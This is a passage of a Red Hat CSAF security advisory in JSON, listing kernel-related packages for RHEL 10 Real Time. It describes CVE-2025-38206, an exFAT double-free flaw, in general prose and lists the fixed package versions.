"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "perf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "RT-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "rv-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "RT-10.1.Z"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38206",
"cwe": {
"id": "CWE-763",
"name": "Release of Invalid Pointer or Reference"
},
"discovery_date": "2025-07-04T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2376377"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel\u0027s exFAT filesystem driver. A local attacker with low privileges could exploit a double free vulnerability within the `delayed_free` function. This memory corruption flaw can lead to a denial of service (DoS), potentially causing system instability or crashes. It may also result in information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Kernel: Double free vulnerability in exFAT filesystem can lead to denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate impact double free vulnerability in the Linux kernel\u0027s exFAT filesystem driver affects Red Hat Enterprise Linux 9 and 10. A local attacker with a special group privileges could exploit this flaw, leading to a denial of service, system instability, or crashes.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
